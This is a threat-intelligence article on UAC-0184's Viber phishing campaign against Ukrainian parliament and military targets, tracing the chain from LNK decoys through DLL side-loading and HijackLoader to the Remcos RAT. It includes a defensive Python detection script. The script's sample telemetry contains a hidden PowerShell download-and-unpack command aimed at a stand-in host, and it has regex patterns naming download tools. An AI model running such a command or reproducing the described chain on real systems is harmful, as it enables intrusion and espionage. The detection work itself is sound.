Russia-linked APT UAC-0184 targets Ukrainian military and government bodies via Viber, delivering malicious ZIP files for espionage in 2025.
Russia-linked threat actor UAC-0184 (aka Hive0156) is targeting Ukrainian military and government entities, using Viber messages to deliver malicious ZIP files as part of ongoing intelligence-gathering operations in 2025.
“Recent monitoring data from the 360 Advanced Threat Research Institute shows that the UAC-0184 group launched a phishing attack campaign against the Verkhovna Rada (Ukrainian parliament), targeting sensitive issues such as the alteration of Ukrainian military personnel files and the refusal to pay compensation for those killed in action,” reads the report published by the 360 Advanced Threat Research Institute.
The 360 Advanced Threat Research Institute observed UAC-0184 launching a phishing campaign against Ukraine’s Verkhovna Rada. The APT group exploited sensitive themes such as military personnel record changes and denied compensation for fallen soldiers. The group is expected to continue intensive intelligence-theft operations against Ukrainian military and government bodies through 2025, prompting recommendations to strengthen security awareness, encryption, and access controls.
The attack campaign leveraged Viber as the initial access vector, sending malicious ZIP archives (A2393.zip) disguised as official Ukrainian parliamentary documents.

Once extracted, victims were presented with deceptive LNK shortcuts posing as DOCX, RTF, and XLSX files related to inquiries from the Verkhovna Rada (Ukrainian parliament) and military casualty data.
When opened, the files started a multi-step infection process designed to avoid detection. A PowerShell script downloaded more malicious files, used a legitimate program (CFlux.exe) to secretly load malware, and showed fake documents to distract the victim, eventually installing HijackLoader and the Remcos RAT.
UAC-0184 uses two main first-stage infection methods: malicious LNK files and PowerShell scripts. Both display decoy documents while covertly executing the HijackLoader chain, but differ in delivery. LNK attacks require two C2 requests to fetch the decoy and the malicious ZIP, while PowerShell attacks use a single request that delivers both.

In the observed case, the LNK file launched a PowerShell script that downloaded and unpacked smoothieks.zip, executed the legitimate CFlux.exe, and opened a decoy document. CFlux.exe side-loaded a malicious DLL that used non-standard control flow to evade analysis by jumping directly into SQLite.Interop.dll.

The malware decrypted embedded data, used module stomping to replace code in legitimate DLLs, and injected shellcode into memory. It reconstructed the final payload from encrypted data hidden in PNG structures, ultimately deploying HijackLoader with configuration details for further stages.
HijackLoader injects the Remcos RAT into the legitimate Chime.exe process, allowing attackers to remotely control the system, steal data, execute commands, and receive instructions from a C2 server.
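The chain described in the two paragraphs above (LNK posing as a document, PowerShell download-and-unpack, CFlux.exe side-loading a DLL from the dropped folder, then Chime.exe spawned as the injection host) lends itself to a simple telemetry check. The following is an added example, not code from the report or the 360 team: it runs a few heuristics over constructed Sysmon-style process-create and image-load events; all paths, the `c2.invalid` host and the `helper.dll` name are made up for the sample.

```python
import re

# Constructed sample telemetry mirroring the reported chain; paths, host
# names and the side-loaded DLL name are invented for this example.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"type": "process", "pid": 2, "ppid": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -c "iwr http://c2.invalid/smoothieks.zip -o $env:TEMP\s.zip; Expand-Archive $env:TEMP\s.zip"'},
    {"type": "process", "pid": 3, "ppid": 2, "image": r"C:\Users\v\AppData\Local\Temp\smoothieks\CFlux.exe", "cmd": "CFlux.exe"},
    {"type": "imageload", "pid": 3, "image": r"C:\Users\v\AppData\Local\Temp\smoothieks\CFlux.exe",
     "loaded": r"C:\Users\v\AppData\Local\Temp\smoothieks\helper.dll"},
    {"type": "process", "pid": 4, "ppid": 3, "image": r"C:\Users\v\AppData\Local\Temp\smoothieks\Chime.exe", "cmd": "Chime.exe"},
    {"type": "process", "pid": 5, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "cmd": "WINWORD.EXE decoy.docx"},
]

DOWNLOAD_CRADLE = re.compile(r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget)\b", re.I)
UNPACK = re.compile(r"expand-archive|\.zip\b", re.I)
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.I)
DECOY_EXT = (".docx", ".rtf", ".xlsx")

def is_masquerading_lnk(filename):
    """True for shortcuts dressed up as documents, e.g. 'inquiry.docx.lnk'."""
    low = filename.lower()
    return low.endswith(".lnk") and low[:-4].endswith(DECOY_EXT)

def detect_chain(events):
    """Return (pid, reason) findings for each stage of the reported chain."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for e in events:
        img = e["image"].lower()
        if e["type"] == "imageload":
            # Search-order side-loading: a DLL loaded from the same
            # user-writable directory as the (legitimate) host executable.
            same_dir = e["loaded"].rsplit("\\", 1)[0].lower() == e["image"].rsplit("\\", 1)[0].lower()
            if USER_WRITABLE.search(e["loaded"]) and same_dir:
                findings.append((e["pid"], "dll side-load from user-writable dir"))
            continue
        parent = procs.get(e["ppid"])
        if img.endswith("powershell.exe") and DOWNLOAD_CRADLE.search(e["cmd"]) and UNPACK.search(e["cmd"]):
            findings.append((e["pid"], "powershell download-and-unpack cradle"))
        if parent and parent["image"].lower().endswith("powershell.exe") and USER_WRITABLE.search(e["image"]):
            findings.append((e["pid"], "executable run from user-writable dir by powershell"))
        if img.endswith("\\chime.exe") and parent and USER_WRITABLE.search(parent["image"]):
            findings.append((e["pid"], "chime.exe launched by dropped binary (injection host)"))
    return findings
```

Each heuristic alone is noisy on a real fleet; the value is in correlating the four stages on one host within a short window, which is what the sample exercises.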
The attribution analysis strongly links the campaign to UAC-0184. The decoy file names and content reference inquiries from the Verkhovna Rada and sensitive issues such as manipulation of military personnel records and denied pensions, aligning with the group’s long-standing focus on Ukrainian government and military intelligence. The use of Viber to deliver malicious archives reflects UAC-0184’s established tactic of exploiting popular messaging platforms in Ukraine, consistent with its past abuse of Signal, Telegram, and other apps, as well as its use of LNK files themed around official investigations and legal requests. Technically, the deployment of HijackLoader to deliver the Remcos RAT matches a known and distinctive toolchain associated with the group. Taken together—target selection, social engineering themes, delivery method, and malware stack—the evidence indicates with high confidence that the operation was conducted by UAC-0184.
“Based on the above, including victim identification, social engineering techniques, and the characteristics of the specialized toolset, there is a high degree of confidence that this attack was caused by the UAC-0184 organization,” concludes the report.